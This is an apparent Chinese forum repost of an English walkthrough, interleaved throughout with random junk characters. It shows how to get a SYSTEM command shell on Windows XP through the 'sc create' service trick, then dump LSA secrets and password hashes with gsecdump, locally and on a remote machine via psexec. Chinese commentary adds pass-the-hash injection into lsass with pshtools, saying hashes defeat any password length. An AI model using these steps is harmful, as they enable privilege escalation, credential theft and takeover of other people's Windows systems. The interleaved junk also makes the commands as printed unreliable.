o get a DOS Prompt as NT system:
. ^7 V" a1 [/ N% C
( z# F* M# S/ Q2 nC:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact; n" ^' h& s. J) Z& i9 y
[SC] CreateService SUCCESS
. s5 m" `# J- Y/ ~" t+ x5 J9 V0 z
C:\>sc start shellcmdline6 n+ h1 V' v! n6 g Q4 J0 f$ a$ p
[SC] StartService FAILED 1053:6 ~: M; L: A! x# ^# D
, u; B& m+ \5 s4 H- j
The service did not respond to the start or control request in a timely fashion.+ v% S/ Y& ]% e: k
3 \8 f' o( U6 y0 @
C:\>sc delete shellcmdline
9 R" H5 D) J" x e. s$ o! ][SC] DeleteService SUCCESS
2 ?( {& ]4 `4 i2 ]( D
5 g" }) ?4 v! m5 b: f------------ z1 n; S X+ A8 U# J( s# S
: ^. c/ D2 u% } H$ H3 l: IThen in the new DOS window:
: W. h/ E& Z7 z/ U3 v8 M5 B% K+ W* b7 o) l$ K2 g
Microsoft Windows XP [Version 5.1.2600]
2 @' ?/ g$ k/ h, S; X0 i. `(C) Copyright 1985-2001 Microsoft Corp.& p2 C- I# ]; T o9 S
7 w( D8 V% g0 V) T! I% D
C:\WINDOWS\system32>whoami
6 V! p6 f0 i* N1 j: ^NT AUTHORITY\SYSTEM
0 _( C" [+ x' K$ G- W1 X
8 e2 O; }" r% _1 b3 _1 g# iC:\WINDOWS\system32>gsecdump -h" l6 k x1 e+ W# c, I" I
gsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)
3 T3 B! O% d/ y6 t8 O+ Kusage: gsecdump [options]0 A& M- f$ d9 J/ g0 d6 h& _
q. i% f) i( ^2 Q# ^% D/ poptions:
# ~: D7 H2 G$ D-h [ --help ] show help
" `0 _- i. |: G& c# l( T" K7 Y6 X4 m-a [ --dump_all ] dump all secrets
4 `: B/ z1 m0 @8 q9 F5 L% O! _-l [ --dump_lsa ] dump lsa secrets
% C$ t# P$ ^/ X; l% H-w [ --dump_wireless ] dump microsoft wireless connections2 z c/ Y, b5 A2 k! ~3 q, P; r* c
-u [ --dump_usedhashes ] dump hashes from active logon sessions0 Y3 [/ R0 u+ |: K
-s [ --dump_hashes ] dump hashes from SAM/AD
- l7 Q0 y6 b: Y6 w3 o$ P+ I, S
: k0 C" T" R/ q3 h& y0 f4 \/ E+ yAlthough I like to use:: Z/ L6 m' s$ L7 i7 \
: e7 C1 H" R, w; O5 e8 W3 m# F
PsExec v1.83 - Execute processes remotely3 r. f9 `; p0 O K3 J+ ^+ d+ H
Copyright (C) 2001-2007 Mark Russinovich! C5 E1 ?2 m+ d- e5 d. G8 }* S
Sysinternals - 链接标记[url]www.sysinternals.com[/url] z. h% F) q* e* D8 L9 \
: T) D6 {0 j8 c4 V- hC:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT* a4 s* k! h% ~
. D$ \& t. Y, P' V5 y& O9 Lto get the hashes from active logon sessions of a remote system.
$ w! {7 S$ `" B9 G8 k1 s) E$ l, [) l) N j4 h
These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.8 X, v: r; I6 C* f
7 o9 m& |' _* I5 a, i) s7 o' n提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.
: D1 @- t, B5 J3 t, T" u原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]
/ m, X% I9 S) q$ G$ d9 x. v& P4 w! B$ b5 a1 U+ y5 c- p( ^' C
我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。
* t0 L& g. ], l/ \- C1 a |
发表于 2012-11-6 21:09:29
收藏
支持
反对